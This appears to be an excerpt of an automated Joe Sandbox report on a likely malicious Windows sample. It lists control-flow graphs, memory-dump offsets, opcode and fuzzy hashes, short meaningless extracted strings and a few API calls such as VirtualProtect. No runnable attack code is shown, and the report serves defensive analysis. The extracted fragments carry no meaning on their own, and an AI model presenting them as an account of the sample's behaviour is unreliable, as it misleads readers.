                                                    control_flow_graph 917 60df980-60df9a7 918 60df9ad-60df9cf 917->918 919 60dfb06-60dfb0f 917->919 956 60df9d1 call 60dfb50 918->956 957 60df9d1 call 60df980 918->957 920 60dfb18-60dfb7d 919->920 921 60dfb11-60dfb16 call 60d2378 919->921 930 60dfb7f 920->930 931 60dfb84-60dfb99 920->931 921->920 928 60df9d7-60dfa01 937 60dfa08-60dfa52 928->937 930->931 935 60dfb9b-60dfb9e call 60dfbee 931->935 936 60dfba4-60dfbcf 931->936 935->936 944 60dfbd9 936->944 945 60dfbd1 936->945 939 60dfa54-60dfa5b 937->939 940 60dfa62-60dfa69 937->940 939->940 941 60dfa6b-60dfa81 940->941 942 60dfae5-60dfb03 940->942 941->942 949 60dfa83-60dfada 941->949 948 60dfbda 944->948 945->944 948->948 949->942 956->928 957->928
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: xaq$xaq
                                                    • API String ID: 0-3966701881
                                                    • Opcode ID: 444ee9eec01014251308d9d6f3340aa40d23c0fa591f768b90910227a9e17f4d
                                                    • Instruction ID: 7e4a166b8d345d18b6d17b682118b0a13d5c46f8dccba857ed57eb0486d29b70
                                                    • Opcode Fuzzy Hash: 444ee9eec01014251308d9d6f3340aa40d23c0fa591f768b90910227a9e17f4d
                                                    • Instruction Fuzzy Hash: B8719930A403058FCB59DF78D550A9ABFF2BF8A304B14C5AED446AB265DB31E906CB90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 959 5fd61a8-5fd61b7 960 5fd61b9-5fd6206 959->960 961 5fd6208-5fd6253 959->961 974 5fd6255-5fd6257 call 5fd626a 960->974 961->974 975 5fd625d-5fd6264 974->975
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q
                                                    • API String ID: 0-3120983240
                                                    • Opcode ID: dfc9533a1c40883aef530ea7b0915c65826cc4e1cbf4a2549670db67656eb498
                                                    • Instruction ID: 5f64e06af468a9b0af5988496d7531cf245c480049a199bbb0717e50459f29d9
                                                    • Opcode Fuzzy Hash: dfc9533a1c40883aef530ea7b0915c65826cc4e1cbf4a2549670db67656eb498
                                                    • Instruction Fuzzy Hash: 4D11813074031A9FCB19EF69E880A5EB7BAFF84300B104A64E5559B658EB74FD098BD0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 977 60a2993-60a29ae 978 60a29b0-60a29c7 977->978 979 60a29f1-60a29f6 977->979 978->979 983 60a29c9-60a29cd 978->983 981 60a29fe-60a2a02 979->981 983->979 984 60a29cf-60a29e9 983->984 984->979
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <hj$thj
                                                    • API String ID: 0-810337276
                                                    • Opcode ID: d605ffb979ce3b45b2ecb23939b549fb90dc9ec990f6c4f3b1081662cacfeecf
                                                    • Instruction ID: 1a94bf300a90e86aa0e97c86a17dd2e00369ba646d77ef67328e3f97fbadb90c
                                                    • Opcode Fuzzy Hash: d605ffb979ce3b45b2ecb23939b549fb90dc9ec990f6c4f3b1081662cacfeecf
                                                    • Instruction Fuzzy Hash: 6601F7306403008FC7959F64DA80A13BBEAFF82350B4445BCD4898F551CB35E849CBA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q
                                                    • API String ID: 0-3120983240
                                                    • Opcode ID: ca408fb17342bbed532803857078dbd3b7049083cb9080b035892d2798e601e4
                                                    • Instruction ID: 508c2e97b94be8a110520971963792a3a765a582ed9f781a36f1dd5086af932f
                                                    • Opcode Fuzzy Hash: ca408fb17342bbed532803857078dbd3b7049083cb9080b035892d2798e601e4
                                                    • Instruction Fuzzy Hash: 13E092305417288FC22DFB2EE58188ABBDEEF842403408DB9D4EA43A24DF70A8098791
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q
                                                    • API String ID: 0-3120983240
                                                    • Opcode ID: 3b1169317f069c15e7db0f23a4f1785c9549687740c7d156839a5afbca221c64
                                                    • Instruction ID: d659ff4bb3ec97b2ececbf62ed87888b3681a86a213e8e1d3c47ab649931e651
                                                    • Opcode Fuzzy Hash: 3b1169317f069c15e7db0f23a4f1785c9549687740c7d156839a5afbca221c64
                                                    • Instruction Fuzzy Hash: 76E092305417148EC32DEF69E68144ABBD6AF802003408DB9D4EA47A28CF70A8098740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 848f77a6d390a07b58d941d68034a0638cbb9a292426e5e88120e3718e3e722e
                                                    • Instruction ID: b0b198c9388c60dce4f15a274c381bfb293cd245d35134d011d7248499f153ac
                                                    • Opcode Fuzzy Hash: 848f77a6d390a07b58d941d68034a0638cbb9a292426e5e88120e3718e3e722e
                                                    • Instruction Fuzzy Hash: 72233339902204EFCB666FA1D51861DBB32FB9A346B30846ADD1253B78CF7A8D51DF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a73d6d4ffec16fe2ad09503c7ce343d6a01afb09060b5ea21b428ff6f4e8d818
                                                    • Instruction ID: 1f72cfc75b168d7e3d9fbdea0b276219140cca305d6a8b7efdaffaf23af2b2d3
                                                    • Opcode Fuzzy Hash: a73d6d4ffec16fe2ad09503c7ce343d6a01afb09060b5ea21b428ff6f4e8d818
                                                    • Instruction Fuzzy Hash: A7233339902204EFCB666FA1D51861DBB32FB9A346B30946ADD1213B78CF7A8D41DF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f7cd67028b5e317638b2206b324c2eca5705fb9e9c84b7061d00bac03f743001
                                                    • Instruction ID: b9311e1483ec39f7353d0a3419a4be30993285df55aee144ff0052acd0496e3a
                                                    • Opcode Fuzzy Hash: f7cd67028b5e317638b2206b324c2eca5705fb9e9c84b7061d00bac03f743001
                                                    • Instruction Fuzzy Hash: 1C233339902204EFCB666FA1D51861DBB32FB9A346B30846ADD1213B78CF7A8D51DF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,7aq
                                                    • API String ID: 0-2975868867
                                                    • Opcode ID: c45ff1ec9f4287dc9838590feb7bf02a43f453b8ad9f8b44d603ddcc35061644
                                                    • Instruction ID: 3990d0e744ab7e37e1369d46b7124853df7e2439c849bc250027f8a98dc741df
                                                    • Opcode Fuzzy Hash: c45ff1ec9f4287dc9838590feb7bf02a43f453b8ad9f8b44d603ddcc35061644
                                                    • Instruction Fuzzy Hash: 9E328E70F802158FDB599BB9C89466E7EB3EFC8340B208469E952DB385DE74DD02CB91
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 021DA734
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3274741143.00000000021D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_21d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 56071d0de5707ed952885930feca4e93b83a5323bcd22dad0eed6fe2a47a82c4
                                                    • Instruction ID: eb4171b4bcc585eb52b792471fbbe8c7c4c41593fbbbf9c86d34ed8685b9a2d7
                                                    • Opcode Fuzzy Hash: 56071d0de5707ed952885930feca4e93b83a5323bcd22dad0eed6fe2a47a82c4
                                                    • Instruction Fuzzy Hash: 4911F4B5D002099FCB20DFAAC984AAFFBF4FF48310F14842AD419A7210C779A945CFA1
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE ref: 021DA8F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3274741143.00000000021D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_21d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 3cb8d87e5aa2fcb55ada510ca55a4eecee5ed63bff5018486fc2a9aa00362006
                                                    • Instruction ID: 50529254be5387f351c70aa93443d3f933cbd4ac24447bebe6d1b7d05d4bc466
                                                    • Opcode Fuzzy Hash: 3cb8d87e5aa2fcb55ada510ca55a4eecee5ed63bff5018486fc2a9aa00362006
                                                    • Instruction Fuzzy Hash: 891128B1D002498BCB20DFAAC5457AEFBF4EF88314F24841AD519A7240CB78A545CBA4
                                                    APIs
                                                      • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                    • SysAllocString.OLEAUT32 ref: 00401898
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocString_malloc
                                                    • String ID:
                                                    • API String ID: 959018026-0
                                                    • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                    • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                    • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                    • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateHeap
                                                    • String ID:
                                                    • API String ID: 10892065-0
                                                    • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                    • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                    • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                    • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (_]q
                                                    • API String ID: 0-188044275
                                                    • Opcode ID: 0eb03401f71a92fbca24c87938a99cde5ff84a3c2081f955e6d4be499e242e98
                                                    • Instruction ID: a609a88cf9316e9d44da3149e12e58d5546c2fcc581ba65c3c98fd796b0529d4
                                                    • Opcode Fuzzy Hash: 0eb03401f71a92fbca24c87938a99cde5ff84a3c2081f955e6d4be499e242e98
                                                    • Instruction Fuzzy Hash: A2918F31B002089FDB58DF69D4546AEBBB2EF8D351F1584A9D805EB390EF71AD41CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: 77f4e9cff2d82e08a8709c114a139ae11e28ab752e33c3567a56f435270b4a35
                                                    • Instruction ID: 1ad2d000bab8057751d279879dc2c1275ba9d0438fb3092a0fe4d4fbc97a849e
                                                    • Opcode Fuzzy Hash: 77f4e9cff2d82e08a8709c114a139ae11e28ab752e33c3567a56f435270b4a35
                                                    • Instruction Fuzzy Hash: BEA1A030B802059FD798DF29C590A6EBBF7EF88310F148569E8468B364DB75EC45CBA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq
                                                    • API String ID: 0-600464949
                                                    • Opcode ID: 85e606cfe3c5f4ae65a32daa8bd3bde0ce68cb36da0d84a34b0780d5caaa4a9c
                                                    • Instruction ID: 37b1382136a0841587cb7790f91690e4f3d2fe451dda4985d2989deed3005ce9
                                                    • Opcode Fuzzy Hash: 85e606cfe3c5f4ae65a32daa8bd3bde0ce68cb36da0d84a34b0780d5caaa4a9c
                                                    • Instruction Fuzzy Hash: F0816174E443169FDB54DF65D898AAEBBF2FF88300F148469E802AB391DB74AC45CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,7aq
                                                    • API String ID: 0-2975868867
                                                    • Opcode ID: 885fc357b675f0ca5831b3e074f2a145a9e2b9f77e72c0315e27ae1835a5dff1
                                                    • Instruction ID: 337e4ea7f088e21c30e35545cc304002cc94e4062fb239ef858411217122cd95
                                                    • Opcode Fuzzy Hash: 885fc357b675f0ca5831b3e074f2a145a9e2b9f77e72c0315e27ae1835a5dff1
                                                    • Instruction Fuzzy Hash: F7714C70F803198FDB599BB9C89066E7FB6AFC8640B60441AD456DB385DF74DC02CB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (_]q
                                                    • API String ID: 0-188044275
                                                    • Opcode ID: f114db52781acbe5654c9c0df9575135c0e4140a49563548c346b43aa276c76a
                                                    • Instruction ID: 3036f2f326bef30c0fcc204d05d80506cbf581d9ec70358846662e70db42f16f
                                                    • Opcode Fuzzy Hash: f114db52781acbe5654c9c0df9575135c0e4140a49563548c346b43aa276c76a
                                                    • Instruction Fuzzy Hash: D8719E71A002489FDF59DFB8C8516ADBBF2BF89314F1584A9D805AB390EB75AD01CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq
                                                    • API String ID: 0-600464949
                                                    • Opcode ID: 03249c67bc0cace669d83eb4c406e916f592e8c466014e402bd79c28f28a61f5
                                                    • Instruction ID: cc8478797c2ddf52feb92cbc21c7e2156ff48cf53d01341cd26bc5247f653e23
                                                    • Opcode Fuzzy Hash: 03249c67bc0cace669d83eb4c406e916f592e8c466014e402bd79c28f28a61f5
                                                    • Instruction Fuzzy Hash: FE813970E40249CFDB94DFA9C498AADBFF2EF48340F148469E806EB395DB709885CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: hj
                                                    • API String ID: 0-1844174126
                                                    • Opcode ID: d83a2729252c86585d05eef3e50da20fc186ee137c94ec22cc9b260db095d334
                                                    • Instruction ID: 078e5a6437a36f3309b4294313cf2f54c4be98eeb19877600204f230ff54c899
                                                    • Opcode Fuzzy Hash: d83a2729252c86585d05eef3e50da20fc186ee137c94ec22cc9b260db095d334
                                                    • Instruction Fuzzy Hash: D2715D30A403099FCB55DF64D984AAEBBF7FF88300F048968D5169B255DB74EC89CBA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: 74ac922e6b6fe59445c83c9706ed726ec4aa1a5a714ad991ca37a632b5a3f58d
                                                    • Instruction ID: 470837ef10685ac9b1ef1ce3ef5f25e64077899c2d81346b5a7e0e1f640f771c
                                                    • Opcode Fuzzy Hash: 74ac922e6b6fe59445c83c9706ed726ec4aa1a5a714ad991ca37a632b5a3f58d
                                                    • Instruction Fuzzy Hash: 3251BF30A407259FC754DFA9D8808AEFBB6FF84350710866AD429DB391CB30AC458BD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $]q
                                                    • API String ID: 0-1007455737
                                                    • Opcode ID: 8365d65afd77bf2864d19e154412100e59eff2674c535bc4424155f97660b298
                                                    • Instruction ID: ca75e11ebc7ad60568beff1b1f2d81df5ee6397dd4ac928ca5c10f1a71ab1679
                                                    • Opcode Fuzzy Hash: 8365d65afd77bf2864d19e154412100e59eff2674c535bc4424155f97660b298
                                                    • Instruction Fuzzy Hash: 56418932B043416FEB559BB9AC90A6A7BEAEFC5310B18447AE409CB291DFB5DC01C791
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Haq
                                                    • API String ID: 0-725504367
                                                    • Opcode ID: bdc8ab3dcec9748a6135b458cabce0e6b81728276d7dc9fe0081f1169b50345c
                                                    • Instruction ID: 14cf7daf73a6efcc1fb22070640d423e222639ccc253ac486ccbf5afabedd33d
                                                    • Opcode Fuzzy Hash: bdc8ab3dcec9748a6135b458cabce0e6b81728276d7dc9fe0081f1169b50345c
                                                    • Instruction Fuzzy Hash: ED510230B90225AFCB49AB78D45056EBAE7AFC8250F148669E802E7348DF35DD428BD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Haq
                                                    • API String ID: 0-725504367
                                                    • Opcode ID: 81dde218918450825eab0f4109db2031747238daf653169a02656e76ff8d8179
                                                    • Instruction ID: 0549c852a97986c19d22d190a67fe2377d9db2b737ee84a1bb53df804475eef6
                                                    • Opcode Fuzzy Hash: 81dde218918450825eab0f4109db2031747238daf653169a02656e76ff8d8179
                                                    • Instruction Fuzzy Hash: A7412235B493859FCB168F79E4106AEBFF2AF85310F1444ABE941EB282CA318C45CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: 45dbf154e645c7b3e451b275611b1be01d17b7854b74e54ede6ebe25aaac2d04
                                                    • Instruction ID: daf43822e7042f4a5427e8d62e04076611392a9ad43250a7d83d831dfbe73184
                                                    • Opcode Fuzzy Hash: 45dbf154e645c7b3e451b275611b1be01d17b7854b74e54ede6ebe25aaac2d04
                                                    • Instruction Fuzzy Hash: 54412670A457444FC3999B39C890AABBFE9AFC6300F04857DD896C7396DE749C09C762
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: hj
                                                    • API String ID: 0-1844174126
                                                    • Opcode ID: baf2528f4157bf2510a075348a1be6aaf1a102d427a931af8d0bfbb269387178
                                                    • Instruction ID: 201bf7a45780e005913a1f416e51b1daa91e36cc52568e38d9d0e06e680693f3
                                                    • Opcode Fuzzy Hash: baf2528f4157bf2510a075348a1be6aaf1a102d427a931af8d0bfbb269387178
                                                    • Instruction Fuzzy Hash: B831B130B843199FC7A89EBDC454B2E7BE6AF89784F1444A9E406CB3A1DF29DC41C791
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $]q
                                                    • API String ID: 0-1007455737
                                                    • Opcode ID: 7c6b160597fa5c41edf114fb2518bcdb73a4d7a0edb32592575017af0b987c13
                                                    • Instruction ID: 609a0f0515d164f310c405c2d976a0d501a1c615f91441e86848795203673768
                                                    • Opcode Fuzzy Hash: 7c6b160597fa5c41edf114fb2518bcdb73a4d7a0edb32592575017af0b987c13
                                                    • Instruction Fuzzy Hash: E1418035700245DFEB499FA9D998B6E7BBAEF88710F104418E806C73A4DB788845CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: bcd9add3daeba262ae352a7827d09204af7a4ba1bc778fc0848aa729d15abde4
                                                    • Instruction ID: 7476b906388af5ef54df8e8357321cf844d028c0761a2d7d484bc23f734e87ce
                                                    • Opcode Fuzzy Hash: bcd9add3daeba262ae352a7827d09204af7a4ba1bc778fc0848aa729d15abde4
                                                    • Instruction Fuzzy Hash: 2731D470A417048FD3988B79D980AABBFE9FFC5300F048939D596C3255DF74A808C761
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q
                                                    • API String ID: 0-1259897404
                                                    • Opcode ID: 2abb7f736bc4a3295a82a9ec9ff6863a5ef7e2da6da1936cff0a2db632e8a325
                                                    • Instruction ID: f7d1cf1cdfccc685ccf96347144bdbf5da5c8727acf2eef6406a91d54b29a32a
                                                    • Opcode Fuzzy Hash: 2abb7f736bc4a3295a82a9ec9ff6863a5ef7e2da6da1936cff0a2db632e8a325
                                                    • Instruction Fuzzy Hash: 5031AE70A407269FCB58CFA8C8908AEFFB5FF49250B10866AD469DB381D770A840CBD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq
                                                    • API String ID: 0-600464949
